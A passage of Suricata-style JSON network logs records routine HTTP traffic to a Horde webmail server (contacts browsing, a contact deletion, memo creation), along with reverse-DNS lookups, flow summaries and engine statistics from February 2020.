Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} {"timestamp":"2020-02-29T00:19:03.020774+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:03.129636+0000","flow_id":97064884588838,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42079,"proto":"UDP","dns":{"type":"answer","id":5765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:03.235603+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896}} {"timestamp":"2020-02-29T00:19:05.000328+0000","flow_id":880338066172632,"event_type":"flow","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6726,"start":"2020-02-29T00:17:59.486104+0000","end":"2020-02-29T00:18:04.703495+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:05.227899+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8765,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:05.336483+0000","flow_id":181357912881723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38040,"proto":"UDP","dns":{"type":"answer","id":8765,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:19:05.357307+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:19:06.004062+0000","flow_id":390853513012744,"event_type":"flow","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:05.878088+0000","end":"2020-02-29T00:14:05.986371+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:06.940891+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4896},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":24479,"tx_id":2}} {"timestamp":"2020-02-29T00:19:06.949852+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:07.058440+0000","flow_id":769897281519196,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56980,"proto":"UDP","dns":{"type":"answer","id":32844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:07.518601+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686}} {"timestamp":"2020-02-29T00:19:08.001030+0000","flow_id":779573836303470,"event_type":"flow","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":2187,"bytes_toclient":13917,"start":"2020-02-29T00:17:26.380014+0000","end":"2020-02-29T00:18:07.306799+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:19:09.000565+0000","flow_id":2196762722510294,"event_type":"flow","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1217,"bytes_toclient":8358,"start":"2020-02-29T00:18:03.337366+0000","end":"2020-02-29T00:18:08.631591+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:10.000202+0000","event_type":"stats","stats":{"uptime":14802,"capture":{"kernel_packets":136642,"kernel_drops":0},"decoder":{"pkts":136671,"bytes":93872046,"invalid":192,"ipv4":135136,"ipv6":10,"ethernet":136671,"raw":0,"null":0,"sll":0,"tcp":129689,"udp":5240,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2814,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2830,"synack":2821,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1851,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2399,"failed_udp":112},"tx":{"http":4725,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2479}},"flow_mgr":{"closed_pruned":2796,"new_pruned":17,"est_pruned":2455,"b
ypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":192948,"memcap":0}}} {"timestamp":"2020-02-29T00:19:10.358985+0000","flow_id":1222994856334552,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34880,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.635244+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30835,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:11.743356+0000","flow_id":2024272545427820,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58238,"proto":"UDP","dns":{"type":"answer","id":30835,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:19:11.811458+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":221,"tx_id":0}} {"timestamp":"2020-02-29T00:19:11.823800+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60096,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:11.928718+0000","flow_id":1783625527824888,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51082,"proto":"UDP","dns":{"type":"answer","id":60096,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:12.005216+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166}} {"timestamp":"2020-02-29T00:19:12.518903+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20686},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} 
{"timestamp":"2020-02-29T00:19:16.000180+0000","flow_id":1132834899264066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5842,"start":"2020-02-29T00:18:10.754242+0000","end":"2020-02-29T00:18:15.965476+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:17.000278+0000","event_type":"stats","stats":{"uptime":14809,"capture":{"kernel_packets":136693,"kernel_drops":0},"decoder":{"pkts":136697,"bytes":93881203,"invalid":192,"ipv4":135160,"ipv6":10,"ethernet":136697,"raw":0,"null":0,"sll":0,"tcp":129709,"udp":5244,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2815,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2831,"synack":2822,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1852,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2401,"failed_udp":112},"tx":{"http":4727,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2481}},"flow_mgr":{"closed_pruned":2797,"new_pruned":17,"est_pruned":2455,"byp
assed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":188756,"memcap":0}}} {"timestamp":"2020-02-29T00:19:17.000992+0000","flow_id":588464974095740,"event_type":"flow","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2873,"bytes_toclient":7803,"start":"2020-02-29T00:18:06.812412+0000","end":"2020-02-29T00:18:16.581516+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:17.006111+0000","flow_id":745974314004663,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34882,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5166},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":23270,"tx_id":1}} {"timestamp":"2020-02-29T00:19:17.310431+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.418887+0000","flow_id":1934138362150047,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46219,"proto":"UDP","dns":{"type":"answer","id":57979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:19:17.482856+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:19:17.489512+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1366,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:17.594290+0000","flow_id":836147152779304,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35956,"proto":"UDP","dns":{"type":"answer","id":1366,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:17.663401+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062}} {"timestamp":"2020-02-29T00:19:19.000177+0000","flow_id":2124693171580563,"event_type":"flow","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6579,"start":"2020-02-29T00:18:07.306835+0000","end":"2020-02-29T00:18:17.541754+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:22.667497+0000","flow_id":1347789426886640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34884,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4062},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19291,"tx_id":1}} 
{"timestamp":"2020-02-29T00:19:24.000190+0000","event_type":"stats","stats":{"uptime":14816,"capture":{"kernel_packets":136721,"kernel_drops":0},"decoder":{"pkts":136725,"bytes":93889541,"invalid":192,"ipv4":135186,"ipv6":10,"ethernet":136725,"raw":0,"null":0,"sll":0,"tcp":129731,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2816,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2832,"synack":2823,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1853,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4729,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2455,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20836,"memcap_state":0,"memcap_global":0},"http":{"memuse":35546,"memcap":0}}} 
